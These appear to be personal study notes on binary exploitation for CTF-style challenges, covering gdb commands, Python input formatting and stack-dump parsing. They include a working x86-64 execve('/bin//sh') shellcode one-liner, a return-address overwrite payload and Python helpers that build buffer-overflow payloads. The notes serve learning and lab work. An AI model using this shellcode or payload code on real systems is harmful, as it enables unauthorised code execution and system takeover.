Definition of pwn

To dominate in such a fashion as to gain ownership. A network, system, organization, or rival that comes under an adversary’s control is said to have been pwned.

This first exploration mainly focuses on pwning compiled code (native binaries).

method

  • analyse the code statically with Ghidra
  • run it under gdb to confirm what the decompiler suggests

GDB

  • set step-mode on: makes the step command stop at the first instruction of a function that has no debug line information instead of stepping over it (useful for stripped binaries and libc).
  • break __libc_start_main: stop before main runs (works even when the binary is stripped and main has no symbol).
  • break *0x...: break at an address (for instance break *0x401218).
  • layout asm: show the disassembly in the TUI.
  • x/150x $sp: dump 150 words starting at the stack pointer, i.e. the top of the stack (use x/150gx for 64-bit words).
  • x/50i $pc: show the next 50 instructions.
  • display/50i $pc: re-display the next 50 instructions every time the program stops.
  • disassemble /m: disassemble the whole current function with source lines interleaved (/s is the newer form of the same option).
  • p $_siginfo._sifields._sigfault.si_addr: after a SIGSEGV, print the address that faulted (tells you whether you control the pointer or just clobbered the return address).
  • https://www.0x0ff.info/2015/buffer-overflow-gdb-part1/

Tips and tricks

  • Python is handy for formatting input bytes. Under Python 3, write a bytes literal with sys.stdout.buffer.write or os.write rather than print(): print('\xa2') emits the two UTF-8 bytes c2 a2, which silently corrupts an address or shellcode. print of a str is only safe while every byte is below 0x80:
print('\x61\x62...')
  • A breakpoint on the function's ret instruction shows the return address directly (it is at the top of the stack, x/gx $sp), and a single step then confirms where execution actually goes.
  • Examples of Python feeding gdb and a target. The trailing `; cat` keeps stdin open so the gdb session (or the spawned shell) stays interactive after the payload is sent. The first one sets a breakpoint, runs, then sends 55 bytes of padding followed by 0x4011a2 as a little-endian 8-byte return address (the newline ends the line for gets()/fgets()); the second sends a 25-byte, NUL-free x86-64 execve("/bin//sh") shellcode:
(python3 -c "import sys; sys.stdout.buffer.write(b'break *0x401266\nr\n'+b'a'*55+b'\xa2\x11\x40\x00\x00\x00\x00\x00\n')"; cat) | gdb pwn
(python3 -c "import os; os.write(1, b'\x31\xc0\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\xb0\x3b\x0f\x05\n')"; cat)|./execut0r
  • To get the machine code of a hand-written payload function, compile it to an object file and disassemble it. For instance, for:
void shell(void){
  puts("Enjoy your shell!");
  system("/bin/bash");
  return;
}

run:

gcc -c test.c
objdump -d test.o

Caveat: in a .o the calls to puts/system and the reference to the string are still relocations (objdump -dr shows them as placeholders), so the bytes are not directly injectable as position-independent shellcode; either fix the addresses up for the target process or rewrite the function so it makes no absolute references.
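The three tips above (bytes-safe input from Python, the overwritten return address, the shellcode) as one worked example. This is added code, not from the original page or its target binary: the padding length 55, the addresses 0x4011a2 and 0x401266, and the shellcode bytes are copied from the page's one-liners only as illustrative values, and the function names (p64, build_payload, stoppers, print_vs_bytes, gdb_stdin) are this example's own.

```python
import struct
import sys

# Constructed for this example: same padding length (55), overwrite address
# (0x4011a2) and breakpoint (0x401266) as the page's gdb one-liner, and the
# page's 25-byte x86-64 execve("/bin//sh") shellcode. Illustrative values,
# not offsets for a specific binary.
OFFSET = 55
RET_ADDR = 0x4011a2
BREAK_ADDR = 0x401266
SHELLCODE = (b"\x31\xc0\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"
             b"\x53\x54\x5f\x52\x57\x54\x5e\xb0\x3b\x0f\x05")


def p64(addr):
    """Pack a 64-bit address little-endian, the byte order it has in memory on x86-64."""
    return struct.pack("<Q", addr)


def build_payload(offset, ret_addr):
    """Padding up to the saved return address, then the address that replaces it."""
    return b"a" * offset + p64(ret_addr)


def stoppers(data, terminators):
    """Offsets of bytes the target's input routine would stop at:
    b"\\n" for gets()/fgets(), b"\\x00" for strcpy()/strlen()-bounded copies.
    An empty list means the whole payload reaches the buffer."""
    return [i for i, b in enumerate(data) if b in terminators]


def print_vs_bytes(byte_value):
    """Why print('\\xNN') is wrong in Python 3 for NN >= 0x80: the str is
    re-encoded as UTF-8 on output. Returns (what print would emit, what the
    target should receive)."""
    return chr(byte_value).encode("utf-8"), bytes([byte_value])


def gdb_stdin(break_addr, payload):
    """What gdb reads from the pipe: its own commands first, then the line
    the inferior consumes once it starts reading stdin."""
    return b"break *%#x\nr\n" % break_addr + payload + b"\n"


if __name__ == "__main__":
    # Bytes-safe equivalent of the page's one-liner; pipe into `gdb pwn` (followed by `cat`).
    sys.stdout.buffer.write(gdb_stdin(BREAK_ADDR, build_payload(OFFSET, RET_ADDR)))
```

The stoppers check is the one to run before blaming the offset: the high NUL bytes of a 64-bit address are harmless for gets()-style readers (they stop on newline), but fatal if the input goes through strcpy.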

read stack

gdb prints each word of x/…x as a little-endian integer, so a string on the stack appears byte-reversed. This script turns the dump back into memory order and prints it as characters:

stack = """
0x7ffdf9b4c130:0x65336135	0x63343465	0x64333637	0x64623637
0x7ffdf9b4c140:0x32323230	0x64386265	0x36323962
"""

for l in stack.split("\n"):
    if ":" not in l:
        continue                      # blank lines, prompt text
    for w in l.split(":")[1].split():
        # word shown as 0xAABBCCDD sits in memory as DD CC BB AA;
        # reversing the decoded bytes works for 4- and 8-byte words alike
        print(bytes.fromhex(w[2:])[::-1].decode("latin-1"), end="")
print()
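A more general version of the same idea, added here as an example (not code from the original page): it parses gdb x/…x output whatever the word width (x/wx, x/gx, with or without a <symbol> after the address), keeps track of the addresses so the dump becomes a contiguous byte image, and can locate a given 64-bit value in it, which is how you find where a candidate return address sits relative to $sp. The first sample is the page's own dump; the x/2gx sample and the function names parse_x_dump, memory_image, as_ascii and find_qword are this example's.

```python
import re

# Constructed samples. SAMPLE_WX is the page's x/wx dump; SAMPLE_GX is a made-up
# x/2gx line with a padding qword followed by a qword that looks like a return address.
SAMPLE_WX = """
0x7ffdf9b4c130:\t0x65336135\t0x63343465\t0x64333637\t0x64623637
0x7ffdf9b4c140:\t0x32323230\t0x64386265\t0x36323962
"""
SAMPLE_GX = """
0x7ffd1234ab00:\t0x4141414141414141\t0x00000000004011a2
"""

# address, optional " <symbol+off>", colon, then the hex words
LINE_RE = re.compile(r"^\s*(0x[0-9a-fA-F]+)(?:\s*<[^>]*>)?:\s*(.*)$")


def parse_x_dump(text):
    """(base_address, bytes) per dump line. Word width is implied by the digit
    count; gdb shows each word as a little-endian integer, so the bytes are
    reversed to recover memory order."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        base = int(m.group(1), 16)
        chunk = b"".join(bytes.fromhex(w[2:])[::-1] for w in m.group(2).split())
        rows.append((base, chunk))
    return rows


def memory_image(text):
    """Join the lines of one x command into a single (start_address, bytes) region.
    One x command prints consecutive memory, so concatenation is safe."""
    rows = parse_x_dump(text)
    if not rows:
        return None, b""
    return rows[0][0], b"".join(chunk for _, chunk in rows)


def as_ascii(text):
    """The page's 'read stack' view: printable bytes as characters, dots elsewhere."""
    _, data = memory_image(text)
    return "".join(chr(b) if 0x20 <= b < 0x7f else "." for b in data)


def find_qword(text, value):
    """Address at which a 64-bit value (e.g. a candidate saved return address)
    sits in the dump, or None if it is not there."""
    start, data = memory_image(text)
    idx = data.find(value.to_bytes(8, "little"))
    return None if idx < 0 else start + idx


if __name__ == "__main__":
    print(as_ascii(SAMPLE_WX))
    print(hex(find_qword(SAMPLE_GX, 0x4011a2)))
```

Paste the output of `x/40gx $sp` into SAMPLE_GX and call find_qword with the address you expect to overwrite; the returned address minus the start of your buffer is the padding length to use in the payload.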

TODO